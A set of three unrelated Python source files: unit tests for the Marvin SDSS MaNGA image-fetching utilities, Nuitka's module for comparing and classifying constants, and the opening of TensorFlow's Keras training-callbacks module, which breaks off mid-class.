            dir3d = getDir3d(plateifu, mode=mode)
            thepath = os.path.join(basepath, self.drpver, plateid, dir3d, 'images', ifu + '.png')
            fullpaths.append(thepath)
        return fullpaths
    def _get_cube(self, release=None):
        # Download the test cube via rsync if it is not already on disk.
        if release:
            self._update_release(release)
        filepath = os.path.join(self.mangaredux, self.drpver, str(self.new_plate), 'stack', self.new_file)
        if not os.path.isfile(filepath):
            rsync_access = RsyncAccess(label='marvin_getlist', verbose=False)
            rsync_access.remote()
            rsync_access.add('mangacube', plate=self.new_plate, drpver=self.drpver, ifu=self.new_ifu, dir3d='stack')
            rsync_access.set_stream()
            rsync_access.commit()
    def _remove_cube(self, release=None):
        # Delete the downloaded test cube, if present.
        if release:
            self._update_release(release)
        filepath = os.path.join(self.mangaredux, self.drpver, str(self.new_plate), 'stack', self.new_file)
        if os.path.isfile(filepath):
            os.remove(filepath)
class TestGetDir3d(TestImagesBase):
    """Tests for getDir3d across modes, releases, and input types.

    BUG FIX: the MPL-5 'local' test was named
    ``test_getdir3d_mastar_local``, colliding with the (skipped) mastar
    test further down; the later definition shadowed the earlier one so
    the MPL-5 local case never ran.  It is renamed to
    ``test_getdir3d_mpl5_local`` to match its _remote/_auto siblings.
    """
    def _getdir3d(self, expval, mode=None, plateifu=None):
        # Assert getDir3d returns `expval` for the given mode and input.
        plateifu = self.plateifu if not plateifu else plateifu
        dir3d = getDir3d(plateifu, mode=mode, release=config.release)
        self.assertEqual(expval, dir3d)
    def test_getdir3d_local(self):
        self._getdir3d('stack', mode='local')
    def test_getdir3d_remote(self):
        self._getdir3d('stack', mode='remote')
    def test_getdir3d_auto(self):
        self._getdir3d('stack', mode='auto')
    def test_getdir3d_mpl5_local(self):
        self._update_release('MPL-5')
        self._getdir3d('stack', mode='local')
    def test_getdir3d_mpl5_remote(self):
        self._update_release('MPL-5')
        self._getdir3d('stack', mode='remote')
    def test_getdir3d_mpl5_auto(self):
        self._update_release('MPL-5')
        self._getdir3d('stack', mode='auto')
    def test_getdir3d_local_plate(self):
        self._update_release('MPL-5')
        self._getdir3d('stack', mode='local', plateifu=self.plate)
    def test_getdir3d_remote_plate(self):
        self._update_release('MPL-5')
        self._getdir3d('stack', mode='remote', plateifu=self.plate)
    def test_getdir3d_auto_plate(self):
        self._update_release('MPL-5')
        self._getdir3d('stack', mode='auto', plateifu=self.plate)
    def test_getdir3d_local_plate_nodb(self):
        self._update_release('MPL-5')
        config.forceDbOff()
        self._getdir3d('stack', mode='local', plateifu=self.plate)
    def test_getdir3d_remote_plate_nodb(self):
        self._update_release('MPL-5')
        config.forceDbOff()
        self._getdir3d('stack', mode='remote', plateifu=self.plate)
    def test_getdir3d_auto_plate_nodb(self):
        self._update_release('MPL-5')
        config.forceDbOff()
        self._getdir3d('stack', mode='auto', plateifu=self.plate)
    def test_getdir3d_local_newplate_nocubes(self):
        # Without DB or local cubes the lookup must fail loudly.
        self._update_release('MPL-5')
        config.forceDbOff()
        errmsg = 'this is the end of the road. Try using some reasonable inputs.'
        with self.assertRaises(MarvinError) as cm:
            self._getdir3d('stack', mode='local', plateifu=self.new_plate)
        self.assertIn(errmsg, str(cm.exception))
    def test_getdir3d_remote_newplate(self):
        self._update_release('MPL-4')
        config.forceDbOff()
        self._getdir3d('stack', mode='remote', plateifu=self.new_plate)
    @unittest.SkipTest
    def test_getdir3d_remote_newplate_fail(self):
        self._update_release('MPL-5')
        config.forceDbOff()
        errmsg = 'Could not retrieve a remote plate. If it is a mastar'
        with self.assertRaises(MarvinError) as cm:
            self._getdir3d('stack', mode='remote', plateifu=self.new_plate)
        self.assertIn(errmsg, str(cm.exception))
    def test_getdir3d_auto_newplate(self):
        self._update_release('MPL-4')
        config.forceDbOff()
        self._getdir3d('stack', mode='auto', plateifu=self.new_plate)
    @unittest.SkipTest
    def test_getdir3d_mastar_local(self):
        self._update_release('MPL-5')
        config.forceDbOff()
        self._getdir3d('mastar', mode='local', plateifu=self.mastar_plateifu)
    @unittest.SkipTest
    def test_getdir3d_mastar_remote(self):
        self._update_release('MPL-5')
        config.forceDbOff()
        self._getdir3d('mastar', mode='remote', plateifu=self.mastar_plateifu)
    @unittest.SkipTest
    def test_getdir3d_mastar_auto(self):
        self._update_release('MPL-5')
        config.forceDbOff()
        self._getdir3d('mastar', mode='auto', plateifu=self.mastar_plateifu)
class TestImagesByList(TestImagesBase):
    """Tests for getImagesByList: input validation, per-mode path generation, downloads."""

    def test_notvalid_input(self):
        """A non-list input raises an AssertionError."""
        errmsg = 'Input must be of type list or Numpy array'
        with self.assertRaises(AssertionError) as cm:
            image = getImagesByList(self.new_plateifu, mode='local')
        self.assertIn(errmsg, str(cm.exception))

    def test_notvalid_objectid(self):
        """A list entry that is neither a plate-ifu nor a mangaid raises an AssertionError."""
        errmsg = 'Input must be of type plate-ifu or mangaid'
        with self.assertRaises(AssertionError) as cm:
            image = getImagesByList(['nogoodid'], mode='local')
        self.assertIn(errmsg, str(cm.exception))

    def test_notvalid_mode(self):
        """An unknown mode raises an AssertionError."""
        errmsg = 'Mode must be either auto, local, or remote'
        with self.assertRaises(AssertionError) as cm:
            image = getImagesByList(self.imagelist, mode='notvalidmode')
        self.assertIn(errmsg, str(cm.exception))

    def _get_imagelist(self, explist, inputlist=None, mode=None, as_url=None):
        """Run getImagesByList and compare against the expected path list."""
        images = getImagesByList(inputlist, mode=mode, as_url=as_url)
        self.assertListEqual(explist, images)

    def test_get_images_auto(self):
        mode = 'auto'
        paths = self._make_paths(self.mangaredux, mode=mode)
        self._get_imagelist(paths, inputlist=self.imagelist, mode=mode)

    def test_get_images_local(self):
        mode = 'local'
        paths = self._make_paths(self.mangaredux, mode=mode)
        self._get_imagelist(paths, inputlist=self.imagelist, mode=mode)

    def test_get_images_local_url(self):
        mode = 'local'
        paths = self._make_paths(self.remoteurl, mode=mode)
        self._get_imagelist(paths, inputlist=self.imagelist, mode=mode, as_url=True)

    def test_get_images_remote_url(self):
        mode = 'remote'
        paths = self._make_paths(self.remoteredux, mode=mode)
        self._get_imagelist(paths, inputlist=self.imagelist, mode=mode, as_url=True)

    def test_get_images_remote(self):
        mode = 'remote'
        paths = self._make_paths(self.mangaredux, mode=mode)
        self._get_imagelist(paths, inputlist=self.imagelist, mode=mode)

    def test_get_images_download_remote(self):
        """download=True in remote mode fetches the file locally and returns None."""
        localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
        remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
        self.assertFalse(os.path.isfile(localpath[0]))
        image = getImagesByList([self.new_plateifu], mode='remote', as_url=True, download=True)
        self.assertTrue(os.path.isfile(localpath[0]))
        self.assertIsNone(image)

    def test_get_images_download_local_fail(self):
        """download=True in local mode issues a MarvinUserWarning instead of downloading."""
        localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
        remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
        self.assertFalse(os.path.isfile(localpath[0]))
        errmsg = 'Download not available when in local mode'
        with warnings.catch_warnings(record=True) as cm:
            warnings.simplefilter("always")
            image = getImagesByList([self.new_plateifu], mode='local', as_url=True, download=True)
            self.assertIs(cm[-1].category, MarvinUserWarning)
            self.assertIn(errmsg, str(cm[-1].message))
class TestImagesByPlate(TestImagesBase):
    """Tests for getImagesByPlate: input validation, per-mode path generation, downloads."""

    def test_notvalid_plate(self):
        """A non-numeric plate id raises an AssertionError."""
        errmsg = 'Plateid must be a numeric integer value'
        with self.assertRaises(AssertionError) as cm:
            image = getImagesByPlate('8485abc', mode='local')
        self.assertIn(errmsg, str(cm.exception))

    def test_notvalid_mode(self):
        """An unknown mode raises an AssertionError."""
        errmsg = 'Mode must be either auto, local, or remote'
        with self.assertRaises(AssertionError) as cm:
            image = getImagesByPlate(self.plate, mode='notvalidmode')
        self.assertIn(errmsg, str(cm.exception))

    def _get_imageplate(self, explist, plate=None, mode=None, as_url=None):
        """Run getImagesByPlate and check the expected path is in the results."""
        images = getImagesByPlate(plate, mode=mode, as_url=as_url)
        self.assertIn(explist[0], images)

    def test_get_images_auto(self):
        mode = 'auto'
        paths = self._make_paths(self.mangaredux, mode=mode, inputs=[self.plateifu])
        self._get_imageplate(paths, plate=self.plate, mode=mode)

    def test_get_images_local(self):
        mode = 'local'
        paths = self._make_paths(self.mangaredux, mode=mode, inputs=[self.plateifu])
        self._get_imageplate(paths, plate=self.plate, mode=mode)

    def test_get_images_local_url(self):
        mode = 'local'
        paths = self._make_paths(self.remoteurl, mode=mode, inputs=[self.plateifu])
        self._get_imageplate(paths, plate=self.plate, mode=mode, as_url=True)

    def test_get_images_remote_url(self):
        mode = 'remote'
        paths = self._make_paths(self.remoteredux, mode=mode, inputs=[self.plateifu])
        self._get_imageplate(paths, plate=self.plate, mode=mode, as_url=True)

    def test_get_images_remote(self):
        mode = 'remote'
        paths = self._make_paths(self.mangaredux, mode=mode, inputs=[self.plateifu])
        self._get_imageplate(paths, plate=self.plate, mode=mode)

    def test_get_images_download_remote(self):
        """download=True in remote mode fetches the file locally and returns None."""
        self._update_release('MPL-4')
        config.forceDbOff()
        self._get_cube()
        localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
        remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
        self.assertFalse(os.path.isfile(localpath[0]))
        image = getImagesByPlate(self.new_plate, mode='remote', as_url=True, download=True)
        self.assertTrue(os.path.isfile(localpath[0]))
        self.assertIsNone(image)

    def test_get_images_download_local_fail(self):
        """download=True in local mode issues a MarvinUserWarning instead of downloading."""
        localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
        remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
        self.assertFalse(os.path.isfile(localpath[0]))
        errmsg = 'Download not available when in local mode'
        with warnings.catch_warnings(record=True) as cm:
            warnings.simplefilter("always")
            image = getImagesByPlate(self.new_plate, mode='local', as_url=True, download=True)
            self.assertIs(cm[-1].category, MarvinUserWarning)
            self.assertIn(errmsg, str(cm[-1].message))
class TestRandomImages(TestImagesBase):
    """Tests for getRandomImages: mode validation, download behavior, random path lists."""

    def test_notvalid_mode(self):
        """An unknown mode raises an AssertionError."""
        errmsg = 'Mode must be either auto, local, or remote'
        with self.assertRaises(AssertionError) as cm:
            image = getRandomImages(mode='notvalidmode')
        self.assertIn(errmsg, str(cm.exception))

    def test_get_images_download_local_fail(self):
        """download=True in local mode issues a MarvinUserWarning instead of downloading."""
        localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
        remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
        self.assertFalse(os.path.isfile(localpath[0]))
        errmsg = 'Download not available when in local mode'
        with warnings.catch_warnings(record=True) as cm:
            warnings.simplefilter("always")
            image = getRandomImages(mode='local', as_url=True, download=True)
            self.assertIs(cm[-1].category, MarvinUserWarning)
            self.assertIn(errmsg, str(cm[-1].message))

    def _get_image_random(self, basedir, num=10, mode=None, as_url=None):
        """Fetch num random image paths and check count, type, and base directory."""
        images = getRandomImages(num=num, mode=mode, as_url=as_url)
        self.assertIn(basedir, images[0])
        self.assertIsInstance(images, list)
        self.assertIsNotNone(images)
        self.assertEqual(num, len(images))

    def test_get_images_auto(self):
        mode = 'auto'
        self._get_image_random(self.mangaredux, mode=mode)

    def test_get_images_local(self):
        mode = 'local'
        self._get_image_random(self.mangaredux, mode=mode)

    def test_get_images_local_num5(self):
        mode = 'local'
        self._get_image_random(self.mangaredux, num=5, mode=mode)

    def test_get_images_local_url(self):
        mode = 'local'
        self._get_image_random(self.remoteurl, mode=mode, as_url=True)

    def test_get_images_remote_url(self):
        mode = 'remote'
        self._get_image_random(self.remoteredux, mode=mode, as_url=True)

    def test_get_images_remote(self):
        mode = 'remote'
        self._get_image_random(self.mangaredux, mode=mode)

    def test_get_images_remote_num5(self):
        mode = 'remote'
        self._get_image_random(self.mangaredux, num=5, mode=mode)
class TestShowImage(TestImagesBase):
    """Tests for showImage: input validation, plateifu/path resolution in all modes."""

    def _show_image(self, path=None, plateifu=None, mode=None, release=None, return_image=True, show_image=None):
        """Call showImage and check the return value matches return_image."""
        image = showImage(path=path, plateifu=plateifu, mode=mode, release=release,
                          return_image=return_image, show_image=show_image)
        if return_image:
            self.assertIsNotNone(image)
        else:
            self.assertIsNone(image)
        return image

    def test_notvalid_mode(self):
        """An unknown mode raises an AssertionError."""
        errmsg = 'Mode must be either auto, local, or remote'
        with self.assertRaises(AssertionError) as cm:
            self._show_image(mode='notvalidmode')
        self.assertIn(errmsg, str(cm.exception))

    def test_noinput(self):
        """Calling with neither path nor plateifu raises an AssertionError."""
        errmsg = 'A filepath or plateifu must be specified!'
        with self.assertRaises(AssertionError) as cm:
            self._show_image()
        self.assertIn(errmsg, str(cm.exception))

    # def test_mode_remote(self):
    #     errmsg = 'showImage currently only works in local mode.'
    #     with self.assertRaises(MarvinError) as cm:
    #         self._show_image(plateifu=self.plateifu, mode='remote')
    #     self.assertIn(errmsg, str(cm.exception))

    def test_mode_auto(self):
        """Auto mode resolves an image for a valid plateifu."""
        image = self._show_image(plateifu=self.plateifu, mode='auto')

    def test_noreturn(self):
        """return_image=False yields None."""
        image = self._show_image(plateifu=self.plateifu, return_image=False)
        self.assertIsNone(image)

    def _plateifu_fail(self, badplateifu, errmsg, mode=None):
        """Check that a bad plateifu raises a MarvinError containing errmsg."""
        with self.assertRaises(MarvinError) as cm:
            self._show_image(plateifu=badplateifu, mode=mode)
        self.assertIn(errmsg, str(cm.exception))

    def test_plateifu_fail_local(self):
        badplateifu = '8485-1905'
        errmsg = 'Error: No files found locally to match plateifu {0}'.format(badplateifu)
        self._plateifu_fail(badplateifu, errmsg, mode='local')

    def test_plateifu_fail_remote(self):
        badplateifu = '8485-1905'
        badfilepath = 'https://data.sdss.org/sas/mangawork/manga/spectro/redux/v1_5_1/8485/stack/images/1905.png'
        errmsg = 'Error: remote filepath {0}'.format(badfilepath)
        self._plateifu_fail(badplateifu, errmsg, mode='remote')

    def test_plateifu_fail_auto(self):
        badplateifu = '8485-1905'
        badfilepath = 'https://data.sdss.org/sas/mangawork/manga/spectro/redux/v1_5_1/8485/stack/images/1905.png'
        errmsg = 'Error: remote filepath {0}'.format(badfilepath)
        self._plateifu_fail(badplateifu, errmsg, mode='auto')

    def _plateifu_success(self, mode=None):
        """A valid plateifu yields a 562x562 PNG whose filename carries plate and ifu."""
        image = self._show_image(plateifu=self.plateifu, mode=mode)
        self.assertIsNotNone(image)
        self.assertEqual(image.size, (562, 562))
        self.assertEqual(image.format, 'PNG')
        self.assertIn(str(self.plate), image.filename)
        self.assertIn(self.ifu, image.filename)
        if mode == 'remote':
            self.assertIn('https://data.sdss.org/sas/', image.filename)

    def test_plateifu_success_local(self):
        self._plateifu_success(mode='local')

    def test_plateifu_success_remote(self):
        self._plateifu_success(mode='remote')

    def test_plateifu_success_auto(self):
        self._plateifu_success(mode='auto')

    def test_path_fails_toomany(self):
        """Passing a list of paths raises a MarvinError."""
        paths = self._make_paths(self.mangaredux, mode='local')
        errmsg = 'showImage currently only works on a single input at a time'
        with self.assertRaises(MarvinError) as cm:
            self._show_image(path=paths)
        self.assertIn(errmsg, str(cm.exception))

    def _path_fails_wrongmode(self, path, errmsg, mode=None):
        """Check that a path/mode mismatch raises a MarvinError containing errmsg."""
        with self.assertRaises(MarvinError) as cm:
            self._show_image(path=path, mode=mode)
        self.assertIn(errmsg, str(cm.exception))

    def test_path_fails_localhttp(self):
        paths = self._make_paths(self.remoteurl, mode='remote')
        errmsg = 'Remote url path not allowed in local mode'
        self._path_fails_wrongmode(paths[0], errmsg, mode='local')

    def test_path_fails_remoteuserdir(self):
        paths = self._make_paths(self.mangaredux, mode='local')
        errmsg = 'Local path not allowed in remote mode'
        self._path_fails_wrongmode(paths[0], errmsg, mode='remote')

    def _path_success(self, paths, mode=None):
        """A valid path yields a 562x562 PNG whose filename carries plate and ifu."""
        image = self._show_image(path=paths[0], mode=mode)
        self.assertIsNotNone(image)
        self.assertEqual(image.size, (562, 562))
        self.assertEqual(image.format, 'PNG')
        self.assertIn(str(self.plate), image.filename)
        self.assertIn(self.ifu, image.filename)
        if mode == 'remote':
            self.assertIn('https://data.sdss.org/sas/', image.filename)

    def test_path_success_local(self):
        paths = self._make_paths(self.mangaredux, mode='local')
        self._path_success(paths, mode='local')

    def test_path_success_remote(self):
        paths = self._make_paths(self.remoteurl, mode='remote')
        self._path_success(paths, mode='remote')

    def test_path_success_auto(self):
        paths = self._make_paths(self.mangaredux, mode='auto')
        self._path_success(paths, mode='auto')

    def test_path_badfile(self):
        """A nonexistent local file raises a MarvinError."""
        badfile = os.path.expanduser('~/test_image.png')
        errmsg = 'Error: local filepath {0} does not exist. '.format(badfile)
        with self.assertRaises(MarvinError) as cm:
            self._show_image(path=badfile)
        self.assertIn(errmsg, str(cm.exception))
# Allow running this test module directly with verbose unittest output.
if __name__ == '__main__':
    verbosity = 2
    unittest.main(verbosity=verbosity)
| |
# Copyright 2015, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Module for constants in Nuitka.
This contains tools to compare, classify and test constants.
"""
import math
from nuitka.utils.Utils import python_version
from .__past__ import iterItems, long, unicode # pylint: disable=W0622
from .Builtins import builtin_anon_names
NoneType = type(None)
def compareConstants(a, b):
    """Compare two constant values for exact equivalence.

    Stricter than plain "==": values of different types never match,
    0.0 and -0.0 are distinct, and NaN compares equal to NaN of the
    same sign. Containers are compared element-wise under the same
    rules.
    """
    # Many many cases to deal with, pylint: disable=R0911,R0912

    # Different types can never be the same constant.
    if type(a) is not type(b):
        return False

    if type(a) is complex:
        # Both components get the full float treatment below.
        return compareConstants(a.real, b.real) and \
               compareConstants(a.imag, b.imag)

    if type(a) is float:
        # The sign bit distinguishes 0.0 from -0.0 and nan from -nan.
        if math.copysign(1.0, a) != math.copysign(1.0, b):
            return False

        # Two NaN values of the same sign count as the same constant.
        if math.isnan(a) and math.isnan(b):
            return True

        return a == b

    if type(a) in (tuple, list):
        # Same length and pairwise equivalent elements.
        return len(a) == len(b) and all(
            compareConstants(x, y) for x, y in zip(a, b)
        )

    if type(a) is dict:
        if len(a) != len(b):
            return False

        # Every item of "a" must have an equivalent item in "b". A linear
        # scan is used because NaN keys/values defeat hashing and "==".
        for key_a, value_a in iterItems(a):
            if not any(
                compareConstants(key_a, key_b) and
                compareConstants(value_a, value_b)
                for key_b, value_b in iterItems(b)
            ):
                return False

        return True

    if type(a) in (frozenset, set):
        if len(a) != len(b):
            return False

        for element in a:
            # Fast path via hashing first; fall back to scanning all of
            # "b" so NaN members can still be matched.
            if element not in b and not any(
                compareConstants(element, other) for other in b
            ):
                return False

        return True

    if type(a) is range:
        return str(a) == str(b)

    # The NaN values of float and complex may let this fail, even if the
    # constants are built in the same way.
    return a == b
# These built-in type references are kind of constant too. TODO: The list is
# totally not complete.
constant_builtin_types = (
    int,
    str,
    float,
    list,
    tuple,
    set,
    dict,
    slice,
    complex
)

# Extend with version-specific types: Python3 adds "range" and "bytes";
# Python2 instead has "unicode", "long", and old-style instance objects.
if python_version >= 300:
    constant_builtin_types += (
        range,
        bytes,
    )
else:
    constant_builtin_types += (
        unicode,
        long,

        # This has no name in Python, but the natural one in C-API.
        builtin_anon_names["instance"]
    )
def isConstant(constant):
    """Check if a value can be expressed as a compile time constant.

    Containers are checked recursively; built-in type references and
    Ellipsis count as constants as well.
    """
    # Too many cases and all return, that is how we do it here,
    # pylint: disable=R0911

    constant_type = type(constant)

    if constant_type is dict:
        # A dict is constant only when every key and every value is.
        return all(
            isConstant(key) and isConstant(value)
            for key, value in iterItems(constant)
        )
    if constant_type in (tuple, list):
        return all(isConstant(element) for element in constant)
    # Simple immediate constants need no recursion.
    if constant_type in (str, unicode, complex, int, long, bool, float,
                        NoneType, range, bytes, set):
        return True
    # Ellipsis and the "NoneType" type object itself are constants too.
    if constant in (Ellipsis, NoneType):
        return True
    if constant_type is type:
        # Built-in type references count as constants.
        return constant in constant_builtin_types
    return constant_type is slice
def isMutable(constant):
    """Is a constant mutable.

    That means a user of a reference to it can modify it. Dictionaries,
    lists, and sets are mutable; a tuple is only as mutable as its most
    mutable element.
    """
    constant_type = type(constant)

    # Simple immutable scalars and slices.
    if constant_type in (str, unicode, complex, int, long, bool, float,
                        NoneType, range, bytes, slice):
        return False
    if constant_type in (dict, list, set):
        return True
    if constant_type is tuple:
        return any(isMutable(value) for value in constant)
    if constant is Ellipsis:
        return False
    if constant in constant_builtin_types:
        # Built-in type references are treated as mutable here.
        return True
    assert False, repr(constant)
def isHashable(constant):
    """Is a constant hashable.

    That means a user of a reference to it can use it for dicts and set
    keys. This is distinct from mutable: a slice is immutable and still
    not hashable.
    """
    # Too many cases and all return, that is how we do it here,
    # pylint: disable=R0911

    constant_type = type(constant)

    # Simple hashable scalars.
    if constant_type in (str, unicode, complex, int, long, bool, float,
                        NoneType, range, bytes):
        return True
    if constant_type in (dict, list, set):
        return False
    if constant_type is tuple:
        # A tuple is hashable only when all its elements are.
        return all(isHashable(value) for value in constant)
    if constant is Ellipsis:
        return True
    if constant in constant_builtin_types:
        return True
    if constant_type is slice:
        return False
    assert False, constant_type
def isIterableConstant(constant):
    """Check if a constant is one of the container/sequence types that can be iterated."""
    return type(constant) in (
        str, unicode, list, tuple, set, frozenset, dict, range, bytes
    )
def getConstantIterationLength(constant):
    """Return the number of elements an iterable constant yields."""
    assert isIterableConstant(constant)

    return len(constant)
def isNumberConstant(constant):
    """Check if a constant is numeric (int, long, float, or bool)."""
    return type(constant) in (int, long, float, bool)
def isIndexConstant(constant):
    """Check if a constant can be used as a sequence index (integral types only)."""
    return type(constant) in (int, long, bool)
def createConstantDict(keys, values, lazy_order):
    """Build a dict constant from parallel key and value sequences.

    Args:
        keys: Sequence of keys.
        values: Sequence of values, parallel to "keys".
        lazy_order: When true, pairs are inserted in reverse order, so for
            duplicate keys the *first* occurrence wins; when false, keys
            are pre-created in order (last duplicate value wins).

    Returns:
        The dictionary built from the pairs.
    """
    if lazy_order:
        constant_value = {}

        keys = list(keys)
        keys.reverse()

        values = list(values)
        values.reverse()
    else:
        # Pre-create all keys up-front to fix their order; "fromkeys"
        # accepts any iterable directly, no intermediate list is needed.
        constant_value = dict.fromkeys(keys, None)

    for key, value in zip(keys, values):
        constant_value[key] = value

    return constant_value
def getConstantWeight(constant):
    """Return a size estimate for a constant.

    Containers weigh the sum of their contents, counted recursively;
    everything else counts as 1.
    """
    constant_type = type(constant)

    if constant_type is dict:
        # Keys and values both contribute.
        return sum(
            getConstantWeight(key) + getConstantWeight(value)
            for key, value in iterItems(constant)
        )
    if constant_type in (tuple, list, set, frozenset):
        return sum(
            getConstantWeight(element) for element in constant
        )
    return 1
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Callbacks: utilities called at certain points during model training.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import deque
from collections import Iterable
from collections import OrderedDict
import csv
import json
import math
import os
import time
import numpy as np
import six
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as tf_summary
from tensorflow.python.util.tf_export import tf_export
# "requests" is an optional dependency (needed only for HTTP callbacks);
# fall back to None so its absence is detectable at use time.
try:
    import requests
except ImportError:
    requests = None
class CallbackList(object):
  """Container abstracting a list of callbacks.

  Fans every lifecycle event out to each contained callback and keeps
  running timing statistics to warn about slow batch-level callbacks.

  Arguments:
      callbacks: List of `Callback` instances.
      queue_length: Queue length for keeping
          running statistics over callback execution time.
  """

  def __init__(self, callbacks=None, queue_length=10):
    # Copy so later mutation of the caller's list has no effect here.
    self.callbacks = list(callbacks) if callbacks else []
    self.queue_length = queue_length

  def append(self, callback):
    """Add one more callback to the container."""
    self.callbacks.append(callback)

  def set_params(self, params):
    """Forward the training parameters to every callback."""
    for cb in self.callbacks:
      cb.set_params(params)

  def set_model(self, model):
    """Forward the model reference to every callback."""
    for cb in self.callbacks:
      cb.set_model(model)

  def on_epoch_begin(self, epoch, logs=None):
    """Called at the start of an epoch.

    Arguments:
        epoch: integer, index of epoch.
        logs: dictionary of logs.
    """
    logs = logs or {}
    for cb in self.callbacks:
      cb.on_epoch_begin(epoch, logs)
    # Reset the per-batch timing statistics for the new epoch.
    self._delta_t_batch = 0.
    self._delta_ts_batch_begin = deque([], maxlen=self.queue_length)
    self._delta_ts_batch_end = deque([], maxlen=self.queue_length)

  def on_epoch_end(self, epoch, logs=None):
    """Called at the end of an epoch.

    Arguments:
        epoch: integer, index of epoch.
        logs: dictionary of logs.
    """
    logs = logs or {}
    for cb in self.callbacks:
      cb.on_epoch_end(epoch, logs)

  def on_batch_begin(self, batch, logs=None):
    """Called right before processing a batch.

    Arguments:
        batch: integer, index of batch within the current epoch.
        logs: dictionary of logs.
    """
    logs = logs or {}
    start = time.time()
    for cb in self.callbacks:
      cb.on_batch_begin(batch, logs)
    self._delta_ts_batch_begin.append(time.time() - start)
    median_delta = np.median(self._delta_ts_batch_begin)
    # Warn when the callbacks consume a large share of the batch time.
    if (self._delta_t_batch > 0. and
        median_delta > 0.95 * self._delta_t_batch and median_delta > 0.1):
      logging.warning('Method on_batch_begin() is slow compared '
                      'to the batch update (%f). Check your callbacks.',
                      median_delta)
    self._t_enter_batch = time.time()

  def on_batch_end(self, batch, logs=None):
    """Called at the end of a batch.

    Arguments:
        batch: integer, index of batch within the current epoch.
        logs: dictionary of logs.
    """
    logs = logs or {}
    if not hasattr(self, '_t_enter_batch'):
      self._t_enter_batch = time.time()
    self._delta_t_batch = time.time() - self._t_enter_batch
    start = time.time()
    for cb in self.callbacks:
      cb.on_batch_end(batch, logs)
    self._delta_ts_batch_end.append(time.time() - start)
    median_delta = np.median(self._delta_ts_batch_end)
    if (self._delta_t_batch > 0. and
        (median_delta > 0.95 * self._delta_t_batch and median_delta > 0.1)):
      logging.warning('Method on_batch_end() is slow compared '
                      'to the batch update (%f). Check your callbacks.',
                      median_delta)

  def on_train_begin(self, logs=None):
    """Called at the beginning of training.

    Arguments:
        logs: dictionary of logs.
    """
    logs = logs or {}
    for cb in self.callbacks:
      cb.on_train_begin(logs)

  def on_train_end(self, logs=None):
    """Called at the end of training.

    Arguments:
        logs: dictionary of logs.
    """
    logs = logs or {}
    for cb in self.callbacks:
      cb.on_train_end(logs)

  def __iter__(self):
    return iter(self.callbacks)
@tf_export('keras.callbacks.Callback')
class Callback(object):
  """Abstract base class used to build new callbacks.

  Attributes:
      params: dict. Training parameters
          (eg. verbosity, batch size, number of epochs...).
      model: instance of `keras.models.Model`.
          Reference of the model being trained.

  The `logs` dictionary that callback methods
  take as argument will contain keys for quantities relevant to
  the current batch or epoch.

  Currently, the `.fit()` method of the `Sequential` model class
  will include the following quantities in the `logs` that
  it passes to its callbacks:

      on_epoch_end: logs include `acc` and `loss`, and
          optionally include `val_loss`
          (if validation is enabled in `fit`), and `val_acc`
          (if validation and accuracy monitoring are enabled).
      on_batch_begin: logs include `size`,
          the number of samples in the current batch.
      on_batch_end: logs include `loss`, and optionally `acc`
          (if accuracy monitoring is enabled).
  """

  def __init__(self):
    self.validation_data = None
    self.model = None

  def set_params(self, params):
    """Store the training parameters dict."""
    self.params = params

  def set_model(self, model):
    """Store a reference to the model being trained."""
    self.model = model

  def on_epoch_begin(self, epoch, logs=None):
    """No-op by default; subclasses override as needed."""
    pass

  def on_epoch_end(self, epoch, logs=None):
    """No-op by default; subclasses override as needed."""
    pass

  def on_batch_begin(self, batch, logs=None):
    """No-op by default; subclasses override as needed."""
    pass

  def on_batch_end(self, batch, logs=None):
    """No-op by default; subclasses override as needed."""
    pass

  def on_train_begin(self, logs=None):
    """No-op by default; subclasses override as needed."""
    pass

  def on_train_end(self, logs=None):
    """No-op by default; subclasses override as needed."""
    pass
@tf_export('keras.callbacks.BaseLogger')
class BaseLogger(Callback):
  """Callback that accumulates epoch averages of metrics.

  This callback is automatically applied to every Keras model.

  Arguments:
      stateful_metrics: Iterable of string names of metrics that
          should *not* be averaged over an epoch.
          Metrics in this list will be logged as-is in `on_epoch_end`.
          All others will be averaged in `on_epoch_end`.
  """

  def __init__(self, stateful_metrics=None):
    super(BaseLogger, self).__init__()
    self.stateful_metrics = set(stateful_metrics or [])

  def on_epoch_begin(self, epoch, logs=None):
    # Reset the running totals at the start of every epoch.
    self.seen = 0
    self.totals = {}

  def on_batch_end(self, batch, logs=None):
    logs = logs or {}
    batch_size = logs.get('size', 0)
    self.seen += batch_size

    for metric, value in logs.items():
      if metric in self.stateful_metrics:
        # Stateful metrics are reported as-is: keep only the latest value.
        self.totals[metric] = value
      else:
